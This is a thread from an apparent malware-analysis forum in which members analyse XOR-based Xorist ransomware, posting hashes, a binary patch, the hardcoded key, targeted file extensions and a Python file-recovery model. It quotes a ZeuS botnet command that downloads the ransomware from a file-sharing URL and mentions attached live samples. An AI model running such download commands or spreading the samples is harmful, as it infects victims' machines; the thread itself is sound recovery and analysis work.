A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #12879  by malwarian
 Tue Apr 24, 2012 4:25 pm
One of my customer's PCs was infected by this rogue, which changed all file extensions to lnk.EnCrYpTeD

I used both dr web tool with -85 and kaspersky tool

dr web tool said that it decrypted 12000 files and kaspersky tool decrypted 6000 files but nothing changed.

Deleted all keys related to EnCrYpTeD in registry still nothing worked :(
 #12890  by Blitskrieg
 Wed Apr 25, 2012 2:57 am
malwarian wrote:
One of my customer's PCs was infected by this rogue, which changed all file extensions to lnk.EnCrYpTeD

I used both dr web tool with -85 and kaspersky tool

dr web tool said that it decrypted 12000 files and kaspersky tool decrypted 6000 files but nothing changed.

Deleted all keys related to EnCrYpTeD in registry still nothing worked :(
Did the utilities fail to decrypt all of the files, or only some of them? Could you attach 2-3 of the problem files?
 #12905  by malwarian
 Wed Apr 25, 2012 5:55 pm
I was able to solve that

Decrypting each .lnk.EnCrYpTeD file extracted three files: .lnk(0), .lnk(1) and the original file. Deleted the other two files ;)

Thanks Blitskrieg for taking the time to respond. I don't have the PC now.
 #25144  by patriq
 Wed Feb 04, 2015 5:11 am
Generic ransomware pushed to small ZeuS botnet machines by script:

user_execute hxxp://ge.tt/api/1/files/4k8mPe82/0/blob?download >> (informations.exe)
[Attached screenshot: zeus script.png]
ec2b6ecfc8ca67f9357b6550166a0838 informations.exe (UPX)
6ec6069728a91a04407283bc6bf208b7 UNPACKED

Some generic ransomware junk. Run in a VM, it asks for a password to decrypt the files, so I thought I would try to crack it.
[Attached screenshot: winxp.png]

I'm not a great RE like most ppl on here so I gave up and just patched the binary :D

Change 00401C19 > JMP 0040124F (decryption routine)

Attached are samples and patched binary in case anyone needs to unlock stuff... I was surprised, the malware does decrypt everything.. I did not look into the encryption routine or the password too much, but I'm sure someone around here can figure it out.
[Attachment: samples and patched binary (3.38 MiB)]
 #25152  by slipstream-
 Wed Feb 04, 2015 2:09 pm
Decided to do some static analysis, first time on crypto ransomware.

The config is stored in the resources, under BITMAP->14. The first 16 bytes are the xor key, the rest is the content; simple decryption - for (int i = 0; i < config_length; i++) config[i] ^= xorkey[i % 16];

Targeted files: *.zip *.rar *.7z *.tar *.gzip *.jpg *.jpeg *.psd *.cdr *.dwg *.max *.bmp *.gif *.png *.doc *.docx *.xls *.xlsx *.ppt *.pptx *.txt *.pdf *.djvu *.mdb *.cer *.pl2 *.pfx *.lcd *.md *.mdf *.dbf *.odt *.vob *.ifo *.lnk *.torrent *.mov *.m2v *.3gp *.mpeg *.mpg *.flv *.avi *.mp4 *.wmv *.divx *.mkv *.mp3 *.wav *.flac *.ape *.wma *.ac3 *.sql *wallet*.dat

After further static analysis, seems it uses the exact same xorkey to decrypt the config as it does to encrypt the files, but this time it does dword xors rather than byte xors.

[ 0x312380da, 0xc9246d86, 0x099f28e8, 0xd48d2804 ]

Valid password is stored in the config, btw. md5(md5(md5(md5(md5(password))))) = cfe27cf06d928fe42d9d8082ad2c9afd
 #25154  by FafZee
 Wed Feb 04, 2015 3:31 pm
Yow,

Xor key : DA 80 23 31 86 6D 24 C9 E8 28 9F 09 04 28 8D D4
It starts 20 bytes after the beginning of the file.

faf'
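A Python model of the scheme as described in posts #25152 and #25154, added here as an illustration for anyone recovering files. It is not code from the thread, from the samples, or from any vendor tool. It uses only the values the thread gives (the four key dwords, the 16-byte key, the 20-byte start offset and the nested-MD5 hash) and shows that the dword key written little-endian is byte-for-byte the 16-byte key from the later post, so a dword XOR and a repeating-key byte XOR recover the same data. Assumptions, marked in the code: the first 20 bytes of an encoded file are left as they are, the key index restarts at that offset, a file tail shorter than a dword is handled bytewise, and each MD5 round hashes the hex digest of the previous round. The config text and victim file below are constructed samples.

```python
import hashlib
import hmac
import struct

# Key as the four DWORDs reported in post #25152.
XOR_KEY_DWORDS = [0x312380DA, 0xC9246D86, 0x099F28E8, 0xD48D2804]
# The same key as the 16-byte sequence reported in post #25154.
XOR_KEY_BYTES = bytes.fromhex("DA802331866D24C9E8289F0904288DD4")
# Number of leading file bytes the XOR skips (post #25154).
FILE_HEADER_LEN = 20
# Fivefold-nested MD5 of the valid password (post #25152).
PASSWORD_HASH_CHAIN = "cfe27cf06d928fe42d9d8082ad2c9afd"


def dwords_to_key_bytes(dwords):
    """Serialise DWORDs little-endian, which is how an x86 dword XOR touches memory."""
    return b"".join(struct.pack("<I", d) for d in dwords)


def xor_with_key(data, key):
    """Repeating-key XOR; it is its own inverse, so one routine encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_config(resource_blob):
    """Resource layout per the thread: 16-byte key, then the XOR-encoded config."""
    key, body = resource_blob[:16], resource_blob[16:]
    return key, xor_with_key(body, key)


def decode_file(encoded, key=XOR_KEY_BYTES, header_len=FILE_HEADER_LEN):
    """Undo the dword XOR that starts header_len bytes into the file.

    Assumptions not stated in the thread: the first header_len bytes are
    returned unchanged, the key index restarts at zero at that offset, and
    trailing bytes that do not fill a whole dword are handled bytewise.
    """
    return encoded[:header_len] + xor_with_key(encoded[header_len:], key)


def md5_chain(candidate, rounds=5):
    """md5(md5(...md5(candidate)...)). Assumes each round re-hashes the ASCII
    hex digest of the previous round, which the thread does not specify."""
    digest = candidate.encode()
    for _ in range(rounds):
        digest = hashlib.md5(digest).hexdigest().encode()
    return digest.decode()


def password_matches(candidate, expected_hex=PASSWORD_HASH_CHAIN, rounds=5):
    """Constant-time comparison of a candidate password against the stored chain."""
    return hmac.compare_digest(md5_chain(candidate, rounds), expected_hex)


if __name__ == "__main__":
    # Constructed sample resource: the thread's key followed by an invented config text.
    config_text = b"ext=.EnCrYpTeD;password=<unknown>"
    resource = XOR_KEY_BYTES + xor_with_key(config_text, XOR_KEY_BYTES)
    key, config = decode_config(resource)
    print("config key equals dword key:", key == dwords_to_key_bytes(XOR_KEY_DWORDS))
    print("decoded config:", config)

    # Constructed sample victim file: 20-byte header plus an invented document body.
    plain = b"-" * FILE_HEADER_LEN + b"%PDF-1.4 constructed sample body"
    encoded = decode_file(plain)  # XOR is an involution: the same call encodes
    print("header untouched:", encoded[:FILE_HEADER_LEN] == plain[:FILE_HEADER_LEN])
    print("round trip ok:", decode_file(encoded) == plain)
    print("candidate accepted:", password_matches("not-the-password"))
```

Because the file routine is a plain repeating-key XOR with a fixed key that never leaves the binary, recovery does not depend on the password at all; the password check only gates the malware's own decrypt button. That is also why a XOR-only scheme with no crypto API imports, as patriq notes further down, is encoding rather than encryption.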
 #25155  by patriq
 Wed Feb 04, 2015 4:15 pm
Kaspersky called a similar sample: Trojan-Ransom.Win32.Xorist

String from sample:
0p3nSOurc3 X0r157

I think it's just XOR encoding, not encryption: I did see XOR operations in the debugger, and I don't recall seeing any Crypto API imports.
Last edited by patriq on Wed Feb 04, 2015 4:23 pm, edited 1 time in total.
 #25157  by FafZee
 Wed Feb 04, 2015 4:18 pm
Sorry for second post, can't edit first :/
Key is hardcoded at 0x557E18 in memory and 0x1c9810 in file.

Faf'
 #25187  by EP_X0FF
 Sat Feb 07, 2015 3:23 am
This is based on the open-source encoder from vazonez script-kiddie. Moved.